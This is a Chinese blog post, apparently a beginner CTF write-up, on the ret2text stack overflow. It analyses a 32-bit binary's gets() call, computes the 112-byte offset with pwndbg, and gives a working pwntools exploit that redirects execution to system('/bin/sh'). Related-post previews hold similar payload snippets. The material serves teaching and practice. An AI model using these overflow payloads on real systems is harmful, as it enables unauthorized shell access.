pwn基本ROP——ret2text

最新推荐文章于 2024-04-04 11:52:25 发布
最新推荐文章于 2024-04-04 11:52:25 发布
阅读量814 收藏 8
点赞数 4
分类专栏: pwn 文章标签: 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/turtlesd/article/details/124410583
版权

ret2text

环境

ret2text

原理

控制主函数的return返回到文件函数中自带的system函数的地址,从而获得最高权限

漏洞分析

利用checksec [file_name]指令获取可执行文件的保护措施开放情况

在这里插入图片描述
命令:

checksec ret2text

可以看到,该可执行文件是32位的,仅开启了NX堆栈不可执行保护。
也就是说,我们无法通过在栈中插入shellcode来让系统运行这段恶意代码。

利用IDA32位进行调试

用IDA打开ret2text文件后,找到main主函数直接按Tab进行反汇编
反汇编结果如下

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char s[100]; // [esp+1Ch] [ebp-64h] BYREF

  setvbuf(stdout, 0, 2, 0);
  setvbuf(_bss_start, 0, 1, 0);
  puts("There is something amazing here, do you know anything?");
  gets(s);
  printf("Maybe I will tell you next time !");
  return 0;
}

在这里我们看到了危险函数gets(),由于gets()函数不对输入数据的边界作限制,我们可以输入任意长度的字符来对栈中数据进行控制。

这时我们点击旁边的函数栏查看函数信息,发现有个secure函数,该函数反汇编结果如下

void secure()
{
  unsigned int v0; // eax
  int input; // [esp+18h] [ebp-10h] BYREF
  int secretcode; // [esp+1Ch] [ebp-Ch]

  v0 = time(0);
  srand(v0);
  secretcode = rand();
  __isoc99_scanf(&unk_8048760, &input);
  if ( input == secretcode )
    system("/bin/sh");
}

可见此函数自带system("/bin/sh")函数,我们直接将主函数返回到system函数的地址即可直接提权

先回到主函数,gets()函数将输入内容存入s数组,根据char s[100]右边的注释我们可以知道s数组从ebp-0x64开始,由于这是32位编码,ebp也占了8个字节,所以return返回的地址在栈中位置为s数组起始位置+0x6c

我们只要输入0x6c个字节填充,然后再输入system("/bin/sh")的位置即可成功将return 0变为return system.addr成功执行提权。

这里我们填充的字符可任意选择,因为此时我们并不关心ebp的值,我们运行到system函数就已经达到了我们的目的而不必关心后续程序如何运行。

为了获取system函数的地址,我们在secure函数中再次按Tab返回汇编语言,再按空格进入.text程序代码段,找到system函数地址
在这里插入图片描述
要注意这里必须用0x0804863a这个地址,因为在执行函数之前也需要将参数传入。

利用pwndbg获取偏移量

我们也可以使用gdb的插件pwndbg来获取return偏移量,方法如下
这里pwndbg需要自行下载
首先在命令行输入gdb ret2text进入pwndbg
再输入cyclic xxx来获取xxx个随机字符,这道题我们使用200个随机字符即可
在这里插入图片描述
然后复制这些字符,继续输入r运行
粘贴这些字符
在这里插入图片描述
可以看到弹出Invalid address 0x62616164
我们输入cyclic -l 0x62616164即可获得对应的偏移量
在这里插入图片描述

payload

from pwn import *
 
io = process('./ret2text')
secure_addr = p32(0x804863A)
 
payload = bytes('a' * 112,'utf-8') + secure_addr

io.sendline(payload)

io.interactive()

编写payload时使用pwntools更方便
关于pwntools的用法可在这里学习

这里的payload就是先用字符’a’填充112(0x6C)个字节,这112个字节中有8个字节是存储ebp的栈空间,剩余的字节是s数组所分配的栈空间,secure_addr占用的则是return的栈空间。

利用此payload后main函数栈空间如下

地址栈中信息
ebp-0x64a
a
ebp-1a
ebpaaaa
ebp+8(return)secure_addr
见过自讼
关注
  • 4
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pwn学习资料整理——ROP技术(pwn_rop2)
08-30
pwn学习资料整理——ROP技术(pwn_rop2)
入门pwn题目ret2text
03-26
入门pwn题目ret2text
PWN PWN PWN !!! 技巧 (1)
Xzzzz911的博客
10-06 1082
多做pwn,多总结,加油,冲冲冲!!!
Pwn学习 (3)
红叶的博客
10-26 638
但是system内的不是熟悉的/bin/sh,而是shell!成功获取shell,不过随时都会关闭,这题的flag存在/home/babyrop的flag中。先覆写到ebp的位置,然后gets 输入system的地址,最后在输入/bin/sh。可以将/bin/sh写入.bss段中,因为未开启PIE,并且bss可执行。研究研究 ret2libc3 再看看后续的题,发现后续的题目都是需要这个的。依旧没有/bin/sh,但是这一次Shift+F12里也没有。此外还需要一个pop_rdi,大佬们的说法是。
ret2text(system($0)),带你彻底搞懂网络安全启动速度优化
最新发布
2401_84102720的博客
04-04 637
我们看道例题经典nx,栈迁移,本该是很简单的一道题,但是涉及到system($0),就难理解了一点点,仅仅是一点点废话不多说,距离rbp,0x10,填充0x18覆盖rbp,构造ret,这时候我们发现有system函数,没有/bin/sh,怎么办,可能有小伙伴想ret2libc,当然可以,但是太过麻烦,我们发现有的tips函数还没有看我们直接进去西索我们详细分析这串代码:这段文本是一个反汇编代码片段,它描述了一个名为tips的函数或过程的汇编实现。这行标记了一个名为tips。
PWN学习总结
windy_ll的博客
12-26 1656
一、栈溢出原理     什么是栈溢出?栈溢出就是缓冲区溢出的一种。 由于缓冲区溢出而使得有用的存储单元被改写,往往会引发不可预料的后果。程序在运行过程中,为了临时存取数据的需要,一般都要分配一些内存空间,通常称这些空间为缓冲区。如果向缓冲区中写入超过其本身长度的数据,以致于缓冲区无法容纳,就会造成缓冲区以外的存储单元被改写,这种现象就称为缓冲区溢出。缓冲区长度一般与用户自己定义的缓冲变量的类型有关。(PS:摘自百度百科)     简单来说,就是程序没有检查用户输入的数据长度,导致攻击者覆盖栈上不是程序希望写
Pwn入门笔记(二)a little栈基础知识
qq_33590156的博客
11-23 432
栈基础知识栈函数调用参数,返回,栈帧上的函数,栈溢出ROP参数返回栈帧上的函数栈溢出ROP后的函数参数寻址 栈 规则为先进后出的一片连续内存,栈底为内存高地址,栈顶为低地址。这里先说一个小知识,指针存的地址,32位程序中占4个字节,而在64位中占8个字节。 在ida中栈结构为 注意左边不是它的地址。输入值时从上到下进行填充, 在底部,s为栈底指针,也就是bp。r是返回地址,这里会直接跳转到上面存的地址,也就是rop的原理。 而当你要计算从b输入多少字节才能把a位置之前填充满,公式为 b-a = 填充
pwn(2) 愚人发现了pwn的有趣之处 对于填充大小的研究
brightendavid的博客
05-09 259
#python3 from pwn import * p = remote('node3.buuoj.cn', '25822') payload = b'b' * (0x40+8)+ p64(0x40060D) p.sendline(payload) p.interactive() 抄了几个wp,一直很奇怪为什么这个填充的字符数量为什么规则不一样。 比如上面的填充规则是输入的字符大小+EBP大小 因为是64位的系统所以EBP大小是8,而前面的0x40是64位,也就是此处输入的字符大小。 后面
pwn小白入门03---ret2text
weixin_45943522的博客
02-21 5916
什么是栈溢出: 栈溢出指的是程序向栈中某个变量中写入的字节数超过了这个变量本身所申请的字节数,因而导致与其相邻的栈中的变量的值被改变(比如gets函数,他不会去验证你输入的值的长度,通过这个函数,你可以往一个本身大小为4字节的数组中填入任意大小的数据,如果填入8字节的数据,将会导致栈溢出,进而程序报错)。就像是往杯子里倒水,水满了溢出来最后烫到你一样。 最简单的栈溢出利用:ret2text 通过栈溢出修改call指令保存在栈上的返回地址(eip的值),这样cpu执行ret指令的时候,就会将被修改的值从栈上取
pwn笔记 - ret2text - 函数传参(x86&x64)
weixin_44227244的博客
09-06 2943
pwn笔记 - ret2text - 函数传参
浅谈 ret2text
akdelt的博客
01-21 911
而此时栈顶指针指向 ‘/bin/sh’ 的地址,于是 ‘/bin/sh’ 被放入 rdi 中,然后执行 ret,此时后门函数地址顶上来了,于是就 ret 到了 func 的地址 (这就是为什么找的是pop rdi;我瞎猜的,不然不好解释)而拿去参数也是同过 EBP 偏移量来实现的,本来有返回地址时通过 [EBP+8] 来拿参数一,但是因为没有返回地址 此时 EBP 和 参数相邻相差 4 个字节,所以 EBP + 8 就不是参数一的地址了。前六个参数依次存放于rdi,rsi,rdx,rcx,r8,r9中。
ROP初探之ret2text
chlet的博客
05-05 476
ROP即返回导向编程是一种计算机安全利用技术,它允许攻击者在存在诸如可执行空间保护和代码签名等安全防御的情况下执行代码。在这种技术中,攻击者通过控制调用栈来劫持程序控制流,并执行机器内存中已存在的精心选择的机器指令序列,称为“gadgets”。每个gadgets通常以返回指令结束,并位于现有程序和/或共享库代码中的子程序内。这些gadgets串联在一起,允许攻击者在使用阻止更简单攻击的防御的机器上执行任意操作。
pwn入门之ret2text
wangxunyu6的博客
01-07 1152
重点来了:存在gets函数,先让我们了解一下gets函数,它可以无限读入数据,造成栈溢出。观察到s变量距离ebp有0x28的距离,对于这个题来说栈结构为先读入s变量然后下面是ebp然后才是返回地址,那么我们就有思路了,往s变量里面填充垃圾数据直到返回地址把返回地址改为我们需要的flag的位置。第四行:这是我们人为构造的代码数据,根据思路填充垃圾数据0x28个,因为这是32位elf文件所以需要再加上4,p32(flag)即为我们的返回地址。0不用管buf是我们输入数据的地方,0x32是能写入的字节数。
pwn学习资料整理——ROP技术(pwn_rop1)
08-30
pwn学习资料整理——ROP技术(pwn_rop1)
pwn07.ret2syscall例题
11-11
ret2syscall例题
ret2libc2pwn 入门题
02-11
pwn 入门题
攻防世界 pwn 二进制漏洞简单题练习区 答题(1-10题解)
小哈里的博客
01-12 5400
序 1、level0 题目描述:菜鸡了解了什么是溢出,他相信自己能得到shell 题目思路: 首先使用checksec检查文件保护机制,是多少位的程序。 64位程序,栈不能执行 继续丢入IDA。 输出字符串helloWord之后执行vulnerable_function()函数,没有与用户交互。 进入vulnerable_function函数,通过伪代码分析逻辑,发现了栈溢出漏洞。 发现buf数组只有0x80字节,但是read函数从中读了0x200个。 或许咱们能够进行溢出,覆盖掉返回地址,
buu pwn刷题——分类题型1——gets溢出无脑填充
苗_的博客
09-07 994
gets漏洞 gets从标准输入设备读字符串函数,其可以无限读取,不会判断上限,以回车结束读取,所以应该确保buffer的空间足够大,以便在执行读操作时不发生溢出。 栈结构: (图自ctf-wiki) warmup_csaw_2016 找到gets漏洞,v5到rbp有0x40的内存 无脑填充即可:'a' * 0x40 + 'b' * 8 + p64(0x40060d) exp #!/usr/bin/python from pwn import * r = remote('no
pwn学习笔记(2)ret_2_text_or_shellcode
qq_66013948的博客
02-04 1148
​ ax寄存器:通用寄存器,可用于存放多种数据​ bp寄存器:存放的是栈帧的栈底地址​ sp寄存器:存放的是栈顶的地址​ 栈帧是存储函数的一些信息的地方,栈帧存储有函数的局部变量,传递给子函数的实际参数,父函数的地址以及上一个栈帧栈底的地址,大致情况如下:​ 在函数调用的过程中,首先会讲bp寄存器的值进行压栈,以方便在恢复的时候恢复栈底寄存器的值,再之后,会按顺序将局部变量压栈,最后是子函数的实际参数,会按照先入栈的后出栈,从最后一个实际参数先入栈再到第一个实际参数,比如函数a(int a ,
pwn ret2libc原理
08-22
- *1* *2* [pwn学习——ret2libc2](https://blog.csdn.net/MrTreebook/article/details/121595367)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值